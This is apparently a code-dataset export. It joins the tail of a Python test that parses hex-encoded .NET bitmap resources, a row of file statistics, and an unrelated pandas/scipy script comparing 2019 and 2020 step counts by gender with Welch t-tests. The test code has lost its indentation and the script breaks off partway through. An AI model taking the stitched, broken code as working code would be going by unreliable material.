'2891D5855137655974933745A92094247A514BCB136AEAB0CC320F9B5B130FC372B4743A30CF' # (...Q7eYt.7E...$zQK..j...2..[...r.t:0.
'666926E932B344415C96A594352C4D93DCD4799867E7BFEF7BA9AF565DF4C00FFEF03CEF8FFF' # fi&.2.DA\...5,M...y.g...{..V].....<...
'C54B00182FD3289043F29F04EA1544BE494924083A14946A31A461E445008CCDE760E94E8175' # .K../.(.C.....D.II$.:..j1.a.E....`.N.u
'301F18BE6B8BB114FC6DAC24C056D02E273926ABB062BE87F92F2A8CB54741A73E8A27F54A1B' # 0...k....m.$.V..'9&..b.../*..GA.>.'.J.
'1A9FE64021F178CC3D0EE5F016046D325258C72BB03C52CCB08E57E2EDC368AC70CB7FC1CFA9' # ...@!.x.=.....m2RX.+.<R...W...h.p.....
'84843041D022A5F465532996860B197CCE9085E0840AF0C9032E9400E1E540B11EA8ED069657' # ..0A."..eS)....|..............@......W
'56E01D17172E089A93296BE95B1116060B187CCE977B4256A547DA033D24957A2496EB51D1D6' # V........)k.[.....|..{BV.G..=$.z$..Q..
'0B830998B75AE12916470A82C644CA5EF8AAC5ECE73B0C3EB768FDFFAA5DF2AC03C669C0B2B4' # .....Z.).G...D.^.....;.>.h...]....i...
'846311115182A021815473031A580C2A069FAB53ECF0FAFE660E07065F3BAF5E8751CB1CCC0B' # .c..Q..!.Ts..X.*...S....f..._;.^.Q....
'0B700F0E160B82BA7852CF7E5263AA379BC1E71AE97AF435EF84A1713B3E3438B3DAF1653A54' # .p......xR.~Rc.7.....z.5...q;>48...e:T
'1A16619A9BC36191285610D4C491C6F2F116267A32187C7E94B1058BD3FE18EB3D82A1D63DAC' # ..a...a.(V........&z2.|~........=...=.
'768C568782AE650CCFCC60BF9F5F9C20A88A25EDD43B25C6BA140C3E57A7EFE0563298FA8330' # v.V...e...`.._....%..;%....>W...V2...0
'D07288D5D6D4D561687A1A462EEFF2F24A100465D1543CD19D0E53A794C1E7A2ABAB31FCDE09' # .r.....ahz.F....J..e.T<...S.......1...
'1DD50E68CADFC06A8B6244D82656C2C3C3B967939B5B9020C80DA15AF31B05463A921966AE85' # ...h...j.bD.&V....g..[.....Z...F:..f..
'FAE22AB4D6DAA3F8C63ADCBEB496D5D6E45D067FAB0925F78DAEAEBFBE729688944D370F4EF6' # ..*......:.......]....%......r...M7.N.
'35842D8EEA25187F2543A1D49DD5FD095FFBB4CFEE3EFE9693908D20F32C516E309D5407516E' # 5.-..%..%C......_....>.......,Qn0.T.Qn
'C5B5ADCF3B4B7CFAAFF8DA0D7047F2DFB17771893CBE97C8FB00D11A47475B01F79872CE1329' # ....;K|.....pG...wq.<.......GG[...r..)
'45B42FF30C5D4FF5A3DB44E4F407F61C3F86E83B9AE4A16C2B8271820000000049454E44AE42' # E./..]O...D.....?..;...l+.q.....IEND.B
'60820B400001000000FFFFFFFF01000000000000000C020000005153797374656D2E44726177' # `..@......................QSystem.Draw
'696E672C2056657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C' # ing,.Version=2.0.0.0,.Culture=neutral,
'205075626C69634B6579546F6B656E3D62303366356637663131643530613361050100000015' # .PublicKeyToken=b03f5f7f11d50a3a......
'53797374656D2E44726177696E672E4269746D61700100000004446174610702020000000903' # System.Drawing.Bitmap.....Data........
'0000000F030000003E0300000289504E470D0A1A0A0000000D49484452000000100000001008' # ........>.....PNG........IHDR.........
'060000001FF3FF610000000467414D410000B18F0BFC61050000001974455874536F66747761' # .......a....gAMA......a.....tEXtSoftwa
'72650041646F626520496D616765526561647971C9653C000002D049444154384F4D926B4893' # re.Adobe.ImageReadyq.e<....IDAT8OM.kH.
'6114C79FA72C9041480D3FF46188E8BC6CDE1882A1794944524486F84D45BC8C694626239CA3' # a....,.AH.?.a...l....yIDRD..ME..iF&#..
'45A6E187422286085D408808CA192489641A9562738E799F69EEA2622EA7E2DDB59D9EF3BC6C' # E...B"..]@....$.d..bs.y.i..b.........l
'F4E1C7FF7DFEE7BCFFE7E59C97FCA29463A7F4AA93D2772E4ADFCE51FA6C8C90FC1142C877A6' # ....}...........c.....w.J..Q.l....B.w.
'D394BE70506AC43AF605DE0100429E6666120B3B303E405F1F9CB6B7C37645C5F68448646201' # ...pPj.:.....B.ff..;0>@_.....vE...Hdb.
'133F4422B3A7AC6CE7B4B515FC4623601FF6DF080F1702943A1DB95559493E523A045D5DE029' # .?D"...l.....F#`........:..UYI>R:.]].)
'2D85B99C1CB02524D8A1A30316E4723B9ED1F71B0C807DE972392132991050ACD516B110D563' # -.....%$......r;......}.r9!2..P......c
'89C438CC6E0CD01F1ABAFEBF06782016BF0F4B4F6F6401C53CE04A75B5CAE7F783D7E7E3FC29' # ..8.n........x....KOod..<.Ju.........)
'2901686BE3FA736D2DE8638F6D7393B3B2B30367E2E29A78C0E5BC3CD5EED111B83C1ECEA652' # ).hk..sm-.c.ms.....g...x...<.....<...R
'09A0D773B52C2F077DECF96CB170AC4E279C954AEFF180F3292945214949AA378383F0920D71' # ...s.,/.}..l.p.N'..J....))E!II.7.....q
'42A100BF4EC7F5494F0F3CEFED85D70303D0D1DD1DE49C54FA28242A4AC5032EB12D88B3B254' # B...N..IO.<............T.($*J....-...T
'B6D5559867C9AB8585E06B6EE63A3E3FCF3DAC8DB26764CAE58290E8E8FB0C6188D7351A44B5' # ..U.g.....kn.:>?.=...gd........a..5.D.
'EFF5C2CEE121D8F3F3E1AF46C375CEE1E01ED6BECECC7026575680CA64F50C21A054AF47D4BB' # .....!.....F.u........p&WV..d..!.T.G..
'2727E0DEDB83A5DC5CF03636729DB6DBB987B511AB95635A5A02B60175708DCA9616A4DE737C' # ''......\.66r.........cZZ...up......s|
'0CEB6CBAB6EC6CF0363470B5B2DBD0C3DAD0E424676C6101487C7C034308286C6A426EBAD994' # ..l...l.64p........$gla.H||.C.(ljBn...
'1D5B5B309B9101A76A3557DC027A581B349938DF666781B0153284806B7575C8ED8D83035876' # .[[0....j5W..zX.4.8.fg...2..kuu.....Xv
'BBC19A960627B5B55CCDEC73D1C3DAC0F838E7CBD4149098182D4308482B2F47EEACEDEF836D' # .....'..\..s.....8.......-C.H+/G.....m
'6383AFEFB8AA8AAB6971917B58EB1F1DE5E07F40A2A35B1942404C410172F7371B94930D6C58' # c.......iq.{X......@..[.B@LA.r.7....lX
'2A056F4D0D570B1B227A58FB64367370903432B2932104885353C94585A2262C39F9216260FF' # *.oM.W.."zX.d6sp.42..!..SS.E..&,9.!b`.
'7B8080875C484CEC0C8D8D35844444BCA2128996C10280FC03EF855F8FAC5638160000000049' # {...\HL....5.DD............_..V8.....I
'454E44AE4260820B400001000000FFFFFFFF01000000000000000C020000005153797374656D' # END.B`..@......................QSystem
'2E44726177696E672C2056657273696F6E3D322E302E302E302C2043756C747572653D6E6575' # .Drawing,.Version=2.0.0.0,.Culture=neu
'7472616C2C205075626C69634B6579546F6B656E3D6230336635663766313164353061336105' # tral,.PublicKeyToken=b03f5f7f11d50a3a.
'010000001553797374656D2E44726177696E672E4269746D6170010000000444617461070202' # .....System.Drawing.Bitmap.....Data...
'00000009030000000F03000000760200000289504E470D0A1A0A0000000D4948445200000010' # .............v.....PNG........IHDR....
'0000001008060000001FF3FF610000000467414D410000B18F0BFC6105000000206348524D00' # ............a....gAMA......a.....cHRM.
'007A26000080840000FA00000080E8000075300000EA6000003A98000017709CBA513C000002' # .z&..............u0...`..:....p..Q<...
'0149444154384FA590BF4B1B611CC6DF9021901F902C596A42290952128B5C4072ED10102434' # .IDAT8O...K.a....!...,YjB).R..\@r...$4
'9721BFFE814CA5482721A06807414470B0984E2E0AADBB92A9A90A1A4EC8051273A1511A6D1A' # .!...L.H'!.h.ADp..N.........N...s.Q.m.
'2E2AD94321CBD7F739CC11D1C90ECFBD0FCFF7F33CC33122FA2FE99F582CC6E2F1384B26932C' # .*.C!...9...........<.1"./..X,...8K&.,
'954AE96F269311B93EDC4B1CBD8145E7D140229178CB818FFC7D8177301850BFDFA7D10CCC93' # .J.o&...>.K...E..@".x....}.w0.P.......
'039224BDCBE5721BBD5E8FB2D9EC028766AFAFBB04C123C30D0CD80703D16814FAD46EB74951' # ..$...r..^......f.....#.......h...n.IQ
'CAD4ED6A5428147E6B9A46107CABD5D26F60C0A2630C88A2C82291C8583A9DFE7C7656A35AAD' # ...jT(.~k.F.|...o`..c...."..X:..|vV.Z.
'4A575797D4E9FCD5058F0C373060D13106C2E170840773D0CECE76ABD1506977F77B33180C7E' # JWW........70`.1...p..s...v..Piw.{3..~
'85E091E136E4D031060441C8552A0A1D1D1DD2E9A94CF57A9D2626DEAC9ACD6606C123C30D0C' # ....6..1..A.U*.......L.z.&&....f..#...
'58748C814020305F2A95A8582C125E55FD459393C2B2C96462103CB251061D63C0EFF7CFF87C' # Xt..@.0_*..X,.^U.E.....db.<.Q..c.....|
'BE45687333FFA75A6DD0FEFECF6A2834B504C123C36DC8A1630C78BD5EE6F1785E0A42685D96' # .Ehs3..Zm....j(4...#.m..c.x.^..x^.Bh].
'2B7470704217171ADDDEFED3058F0C373060D13106DC6E37B42CCB35DADBFB41C7C715CAE7B7' # +tppB..........70`.1..n7.,.5...A......
'DAE57283207864B881018B8E31E072B9A0F7D3D333DF14E59CC6C75F7F713A9D2BB2ACF2824A' # ..r..xd.....1.r.....3......_.q:.+....J
'F0C8700303169D07031C6276BB3D66B3D9561D0EC72BBCCDE60DFFA11D1ACDC0807D728003CC' # ..p.......bv.=f..V...+...........}r...
'6AB5EAB2582C12D7DABDA4610EE6D1C0F345EC0E5F6D13DFD7F80D2E0000000049454E44AE42' # j...X,.....a.....E.._m..........IEND.B
'60820B' # `..
)
parsed = NetManifestResource(StreamReader(manifest))
self.assertEqual(len(parsed.Resources), 11)
def test_guid_formatter(self):
guid_text = 'AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE'
guid = StringGUID(StreamReader(b'\xAA\xAA\xAA\xAA\xBB\xBB\xCC\xCC\xDD\xDD\xEE\xEE\xEE\xEE\xEE\xEE'))
self.assertEqual(str(guid), guid_text)
| 122.702312
| 132
| 0.674031
| 2,480
| 42,455
| 11.517339
| 0.315323
| 0.002381
| 0.001786
| 0.002381
| 0.132094
| 0.130589
| 0.127158
| 0.121801
| 0.120996
| 0.114729
| 0
| 0.48118
| 0.12578
| 42,455
| 345
| 133
| 123.057971
| 0.288401
| 0.283382
| 0
| 0.10119
| 0
| 0.002976
| 0.781822
| 0.781623
| 0
| 1
| 0.000166
| 0
| 0.014881
| 1
| 0.011905
| false
| 0
| 0.011905
| 0
| 0.026786
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4920ccd277b01e335dc6496cd45b9c4f0971db50
| 33,762
|
py
|
Python
|
Data_analysis_code.py
|
przwrobel/IER
|
4561ae68719928e764b07900d78501d470a6b5a6
|
[
"CC-BY-4.0"
] | null | null | null |
Data_analysis_code.py
|
przwrobel/IER
|
4561ae68719928e764b07900d78501d470a6b5a6
|
[
"CC-BY-4.0"
] | null | null | null |
Data_analysis_code.py
|
przwrobel/IER
|
4561ae68719928e764b07900d78501d470a6b5a6
|
[
"CC-BY-4.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sat May 8 18:22:37 2021
@author: user
"""
from tableone import TableOne, load_dataset
import pandas as pd
import os
import scipy
#READING DATA
path = os.getcwd() + '\Data_IER.csv'
data=pd.read_csv(path,encoding='cp1252')
#SORTING INTO RELEVANT CATEGORIES
participants_2019 = data[data['year'].isin([2019])]
participants_2019_male= participants_2019[participants_2019['gender'].isin(['Male'])]
participants_2019_female= participants_2019[participants_2019['gender'].isin(['Female'])]
participants_2020 = data[data['year'].isin([2020])]
participants_2020_male= participants_2020[participants_2020['gender'].isin(['Male'])]
participants_2020_female= participants_2020[participants_2020['gender'].isin(['Female'])]
#CREATING TABLE ONE
columns = ['gender','bmi','living']
categorical = ['living']
groupby = 'gender'
mytable = TableOne(participants_2019 , columns=columns, categorical=categorical, groupby=groupby)
print(mytable.tabulate(tablefmt="latex"))
mytable_2 = TableOne(participants_2020 , columns=columns, categorical=categorical, groupby=groupby)
print(mytable_2.tabulate(tablefmt="latex"))
#FILTERING NECESSARY DATA AND CALCULATING WEEKEND/WEEKDAY AVERAGES
#Overall 2019 weekdays app
temp = participants_2019[~participants_2019[['stap_app_1_aantal','stap_app_2_aantal','stap_app_3_aantal','stap_app_4_aantal','stap_app_5_aantal','stap_app_6_aantal','stap_app_7_aantal']].isin(['nan']).any(axis=1)]
participants_2019_weekdays_app=temp[['stap_app_1_aantal','stap_app_2_aantal','stap_app_6_aantal','stap_app_7_aantal','stap_app_5_aantal']]
temp_avg=participants_2019_weekdays_app.mean(axis=1)
participants_2019_weekdays_app['avg']=temp_avg
#Overall 2020 weekdays app
temp = participants_2020[~participants_2020[['stap_app_1_aantal','stap_app_2_aantal','stap_app_3_aantal','stap_app_4_aantal','stap_app_5_aantal','stap_app_6_aantal','stap_app_7_aantal']].isin(['nan']).any(axis=1)]
participants_2020_weekdays_app=temp[['stap_app_1_aantal','stap_app_2_aantal','stap_app_6_aantal','stap_app_7_aantal','stap_app_5_aantal']]
temp_avg=participants_2020_weekdays_app.mean(axis=1)
participants_2020_weekdays_app['avg']=temp_avg
#Male 2019 weekdays app
temp = participants_2019_male[~participants_2019_male[['stap_app_1_aantal','stap_app_2_aantal','stap_app_3_aantal','stap_app_4_aantal','stap_app_5_aantal','stap_app_6_aantal','stap_app_7_aantal']].isin(['nan']).any(axis=1)]
participants_2019_male_weekdays_app=temp[['stap_app_1_aantal','stap_app_2_aantal','stap_app_6_aantal','stap_app_7_aantal','stap_app_5_aantal']]
temp_avg=participants_2019_male_weekdays_app.mean(axis=1)
participants_2019_male_weekdays_app['avg']=temp_avg
#Female 2019 weekdays app
temp = participants_2019_female[~participants_2019_female[['stap_app_1_aantal','stap_app_2_aantal','stap_app_3_aantal','stap_app_4_aantal','stap_app_5_aantal','stap_app_6_aantal','stap_app_7_aantal']].isin(['nan']).any(axis=1)]
participants_2019_female_weekdays_app=temp[['stap_app_1_aantal','stap_app_2_aantal','stap_app_6_aantal','stap_app_7_aantal','stap_app_5_aantal']]
temp_avg=participants_2019_female_weekdays_app.mean(axis=1)
participants_2019_female_weekdays_app['avg']=temp_avg
#Male 2020 weekdays app
temp = participants_2020_male[~participants_2020_male[['stap_app_1_aantal','stap_app_2_aantal','stap_app_3_aantal','stap_app_4_aantal','stap_app_5_aantal','stap_app_6_aantal','stap_app_7_aantal']].isin(['nan']).any(axis=1)]
participants_2020_male_weekdays_app=temp[['stap_app_1_aantal','stap_app_2_aantal','stap_app_6_aantal','stap_app_7_aantal','stap_app_5_aantal']]
temp_avg=participants_2020_male_weekdays_app.mean(axis=1)
participants_2020_male_weekdays_app['avg']=temp_avg
#Female 2020 weekdays app
temp = participants_2020_female[~participants_2020_female[['stap_app_1_aantal','stap_app_2_aantal','stap_app_3_aantal','stap_app_4_aantal','stap_app_5_aantal','stap_app_6_aantal','stap_app_7_aantal']].isin(['nan']).any(axis=1)]
participants_2020_female_weekdays_app=temp[['stap_app_1_aantal','stap_app_2_aantal','stap_app_6_aantal','stap_app_7_aantal','stap_app_5_aantal']]
temp_avg=participants_2020_female_weekdays_app.mean(axis=1)
participants_2020_female_weekdays_app['avg']=temp_avg
##################################################
#Overall 2019 weekends app
temp = participants_2019[~participants_2019[['stap_app_1_aantal','stap_app_2_aantal','stap_app_3_aantal','stap_app_4_aantal','stap_app_5_aantal','stap_app_6_aantal','stap_app_7_aantal']].isin(['nan']).any(axis=1)]
participants_2019_weekends_app=temp[['stap_app_3_aantal','stap_app_4_aantal']]
temp_avg=participants_2019_weekends_app.mean(axis=1)
participants_2019_weekends_app['avg']=temp_avg
#Overall 2020 weekends app
temp = participants_2020[~participants_2020[['stap_app_1_aantal','stap_app_2_aantal','stap_app_3_aantal','stap_app_4_aantal','stap_app_5_aantal','stap_app_6_aantal','stap_app_7_aantal']].isin(['nan']).any(axis=1)]
participants_2020_weekends_app=temp[['stap_app_3_aantal','stap_app_4_aantal']]
temp_avg=participants_2020_weekends_app.mean(axis=1)
participants_2020_weekends_app['avg']=temp_avg
#Male 2019 weekends app
temp = participants_2019_male[~participants_2019_male[['stap_app_1_aantal','stap_app_2_aantal','stap_app_3_aantal','stap_app_4_aantal','stap_app_5_aantal','stap_app_6_aantal','stap_app_7_aantal']].isin(['nan']).any(axis=1)]
participants_2019_male_weekends_app=temp[['stap_app_3_aantal','stap_app_4_aantal']]
temp_avg=participants_2019_male_weekends_app.mean(axis=1)
participants_2019_male_weekends_app['avg']=temp_avg
#Female 2019 weekends app
temp = participants_2019_female[~participants_2019_female[['stap_app_1_aantal','stap_app_2_aantal','stap_app_3_aantal','stap_app_4_aantal','stap_app_5_aantal','stap_app_6_aantal','stap_app_7_aantal']].isin(['nan']).any(axis=1)]
participants_2019_female_weekends_app=temp[['stap_app_3_aantal','stap_app_4_aantal']]
temp_avg=participants_2019_female_weekends_app.mean(axis=1)
participants_2019_female_weekends_app['avg']=temp_avg
#Male 2020 weekends app
temp = participants_2020_male[~participants_2020_male[['stap_app_1_aantal','stap_app_2_aantal','stap_app_3_aantal','stap_app_4_aantal','stap_app_5_aantal','stap_app_6_aantal','stap_app_7_aantal']].isin(['nan']).any(axis=1)]
participants_2020_male_weekends_app=temp[['stap_app_3_aantal','stap_app_4_aantal']]
temp_avg=participants_2020_male_weekends_app.mean(axis=1)
participants_2020_male_weekends_app['avg']=temp_avg
#Female 2020 weekends app
temp = participants_2020_female[~participants_2020_female[['stap_app_1_aantal','stap_app_2_aantal','stap_app_3_aantal','stap_app_4_aantal','stap_app_5_aantal','stap_app_6_aantal','stap_app_7_aantal']].isin(['nan']).any(axis=1)]
participants_2020_female_weekends_app=temp[['stap_app_3_aantal','stap_app_4_aantal']]
temp_avg=participants_2020_female_weekends_app.mean(axis=1)
participants_2020_female_weekends_app['avg']=temp_avg
###################################################
#Overall 2019 weekdays Omron
temp = participants_2019[~participants_2019[['stap_om_1_aantal','stap_om_2_aantal','stap_om_3_aantal','stap_om_4_aantal','stap_om_5_aantal','stap_om_6_aantal','stap_om_7_aantal']].isin(['nan']).any(axis=1)]
participants_2019_weekdays_om=temp[['stap_om_1_aantal','stap_om_2_aantal','stap_om_6_aantal','stap_om_7_aantal','stap_om_5_aantal']]
temp_avg=participants_2019_weekdays_om.mean(axis=1)
participants_2019_weekdays_om['avg']=temp_avg
#Overall 2020 weekdays Omron
temp = participants_2020[~participants_2020[['stap_om_1_aantal','stap_om_2_aantal','stap_om_3_aantal','stap_om_4_aantal','stap_om_5_aantal','stap_om_6_aantal','stap_om_7_aantal']].isin(['nan']).any(axis=1)]
participants_2020_weekdays_om=temp[['stap_om_1_aantal','stap_om_2_aantal','stap_om_6_aantal','stap_om_7_aantal','stap_om_5_aantal']]
temp_avg=participants_2020_weekdays_om.mean(axis=1)
participants_2020_weekdays_om['avg']=temp_avg
#Male 2019 weekdays Omron
temp = participants_2019_male[~participants_2019_male[['stap_om_1_aantal','stap_om_2_aantal','stap_om_3_aantal','stap_om_4_aantal','stap_om_5_aantal','stap_om_6_aantal','stap_om_7_aantal']].isin(['nan']).any(axis=1)]
participants_2019_male_weekdays_om=temp[['stap_om_1_aantal','stap_om_2_aantal','stap_om_6_aantal','stap_om_7_aantal','stap_om_5_aantal']]
temp_avg=participants_2019_male_weekdays_om.mean(axis=1)
participants_2019_male_weekdays_om['avg']=temp_avg
#Female 2019 weekdays Omron
temp = participants_2019_female[~participants_2019_female[['stap_om_1_aantal','stap_om_2_aantal','stap_om_3_aantal','stap_om_4_aantal','stap_om_5_aantal','stap_om_6_aantal','stap_om_7_aantal']].isin(['nan']).any(axis=1)]
participants_2019_female_weekdays_om=temp[['stap_om_1_aantal','stap_om_2_aantal','stap_om_6_aantal','stap_om_7_aantal','stap_om_5_aantal']]
temp_avg=participants_2019_female_weekdays_om.mean(axis=1)
participants_2019_female_weekdays_om['avg']=temp_avg
#Male 2020 weekdays Omron
temp = participants_2020_male[~participants_2020_male[['stap_om_1_aantal','stap_om_2_aantal','stap_om_3_aantal','stap_om_4_aantal','stap_om_5_aantal','stap_om_6_aantal','stap_om_7_aantal']].isin(['nan']).any(axis=1)]
participants_2020_male_weekdays_om=temp[['stap_om_1_aantal','stap_om_2_aantal','stap_om_6_aantal','stap_om_7_aantal','stap_om_5_aantal']]
temp_avg=participants_2020_male_weekdays_om.mean(axis=1)
participants_2020_male_weekdays_om['avg']=temp_avg
#Female 2020 weekdays Omron
temp = participants_2020_female[~participants_2020_female[['stap_om_1_aantal','stap_om_2_aantal','stap_om_3_aantal','stap_om_4_aantal','stap_om_5_aantal','stap_om_6_aantal','stap_om_7_aantal']].isin(['nan']).any(axis=1)]
participants_2020_female_weekdays_om=temp[['stap_om_1_aantal','stap_om_2_aantal','stap_om_6_aantal','stap_om_7_aantal','stap_om_5_aantal']]
temp_avg=participants_2020_female_weekdays_om.mean(axis=1)
participants_2020_female_weekdays_om['avg']=temp_avg
##################################################
#Overall 2019 weekends Omron
temp = participants_2019[~participants_2019[['stap_om_1_aantal','stap_om_2_aantal','stap_om_3_aantal','stap_om_4_aantal','stap_om_5_aantal','stap_om_6_aantal','stap_om_7_aantal']].isin(['nan']).any(axis=1)]
participants_2019_weekends_om=temp[['stap_om_3_aantal','stap_om_4_aantal']]
temp_avg=participants_2019_weekends_om.mean(axis=1)
participants_2019_weekends_om['avg']=temp_avg
#Overall 2020 weekends Omron
temp = participants_2020[~participants_2020[['stap_om_1_aantal','stap_om_2_aantal','stap_om_3_aantal','stap_om_4_aantal','stap_om_5_aantal','stap_om_6_aantal','stap_om_7_aantal']].isin(['nan']).any(axis=1)]
participants_2020_weekends_om=temp[['stap_om_3_aantal','stap_om_4_aantal']]
temp_avg=participants_2020_weekends_om.mean(axis=1)
participants_2020_weekends_om['avg']=temp_avg
#Male 2019 weekends Omron
temp = participants_2019_male[~participants_2019_male[['stap_om_1_aantal','stap_om_2_aantal','stap_om_3_aantal','stap_om_4_aantal','stap_om_5_aantal','stap_om_6_aantal','stap_om_7_aantal']].isin(['nan']).any(axis=1)]
participants_2019_male_weekends_om=temp[['stap_om_3_aantal','stap_om_4_aantal']]
temp_avg=participants_2019_male_weekends_om.mean(axis=1)
participants_2019_male_weekends_om['avg']=temp_avg
#Female 2019 weekends Omron
temp = participants_2019_female[~participants_2019_female[['stap_om_1_aantal','stap_om_2_aantal','stap_om_3_aantal','stap_om_4_aantal','stap_om_5_aantal','stap_om_6_aantal','stap_om_7_aantal']].isin(['nan']).any(axis=1)]
participants_2019_female_weekends_om=temp[['stap_om_3_aantal','stap_om_4_aantal']]
temp_avg=participants_2019_female_weekends_om.mean(axis=1)
participants_2019_female_weekends_om['avg']=temp_avg
#Male 2020 weekends Omron
temp = participants_2020_male[~participants_2020_male[['stap_om_1_aantal','stap_om_2_aantal','stap_om_3_aantal','stap_om_4_aantal','stap_om_5_aantal','stap_om_6_aantal','stap_om_7_aantal']].isin(['nan']).any(axis=1)]
participants_2020_male_weekends_om=temp[['stap_om_3_aantal','stap_om_4_aantal']]
temp_avg=participants_2020_male_weekends_om.mean(axis=1)
participants_2020_male_weekends_om['avg']=temp_avg
#Female 2020 weekends Omron
temp = participants_2020_female[~participants_2020_female[['stap_om_1_aantal','stap_om_2_aantal','stap_om_3_aantal','stap_om_4_aantal','stap_om_5_aantal','stap_om_6_aantal','stap_om_7_aantal']].isin(['nan']).any(axis=1)]
participants_2020_female_weekends_om=temp[['stap_om_3_aantal','stap_om_4_aantal']]
temp_avg=participants_2020_female_weekends_om.mean(axis=1)
participants_2020_female_weekends_om['avg']=temp_avg
###################################################
#UNPAIRED T-TESTS (RESULTS ARE WRITTEN TO "results.txt")
f = open("results.txt", "w")
#OVERALL
###################################################
f.write("Overall weekdays app \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_weekdays_app['avg'],participants_2020_weekdays_app['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_2019=")
f.write(str(participants_2019_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_2020=")
f.write(str(participants_2020_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_2019=")
f.write(str(participants_2019_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_2020=")
f.write(str(participants_2020_weekdays_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Overall weekdays Omron \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_weekdays_om['avg'],participants_2020_weekdays_om['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_2019=")
f.write(str(participants_2019_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_2020=")
f.write(str(participants_2020_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_2019=")
f.write(str(participants_2019_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_2020=")
f.write(str(participants_2020_weekdays_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Overall weekends app \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_weekends_app['avg'],participants_2020_weekends_app['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_2019=")
f.write(str(participants_2019_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_2020=")
f.write(str(participants_2020_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_2019=")
f.write(str(participants_2019_weekends_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_2020=")
f.write(str(participants_2020_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Overall weekends Omron \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_weekends_om['avg'],participants_2020_weekends_om['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_2019=")
f.write(str(participants_2019_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_2020=")
f.write(str(participants_2020_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_2019=")
f.write(str(participants_2019_weekends_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_2020=")
f.write(str(participants_2020_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
#########################################
#MALE
#########################################
f.write("Male weekdays app \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_male_weekdays_app['avg'],participants_2020_male_weekdays_app['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_2019=")
f.write(str(participants_2019_male_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_2020=")
f.write(str(participants_2020_male_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_2019=")
f.write(str(participants_2019_male_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_2020=")
f.write(str(participants_2020_male_weekdays_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Male weekdays Omron \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_male_weekdays_om['avg'],participants_2020_male_weekdays_om['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_2019=")
f.write(str(participants_2019_male_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_2020=")
f.write(str(participants_2020_male_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_2019=")
f.write(str(participants_2019_male_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_2020=")
f.write(str(participants_2020_male_weekdays_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Male weekends app \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_male_weekends_app['avg'],participants_2020_male_weekends_app['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_2019=")
f.write(str(participants_2019_male_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_2020=")
f.write(str(participants_2020_male_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_2019=")
f.write(str(participants_2019_male_weekends_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_2020=")
f.write(str(participants_2020_male_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Male weekends Omron \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_male_weekends_om['avg'],participants_2020_male_weekends_om['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_2019=")
f.write(str(participants_2019_male_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_2020=")
f.write(str(participants_2020_male_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_2019=")
f.write(str(participants_2019_male_weekends_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_2020=")
f.write(str(participants_2020_male_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
#########################################
#FEMALE
#########################################
f.write("Female weekdays app \n")
temp_test=str(scipy.stats.ttest_ind(participants_2019_female_weekdays_app['avg'],participants_2020_female_weekdays_app['avg'],axis=0,equal_var=False))
f.write(temp_test)
f.write("\n")
f.write("mean_2019=")
f.write(str(participants_2019_female_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_2020=")
f.write(str(participants_2020_female_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_2019=")
f.write(str(participants_2019_female_weekdays_app['avg'].std(axis=0)))
f.write("\n")
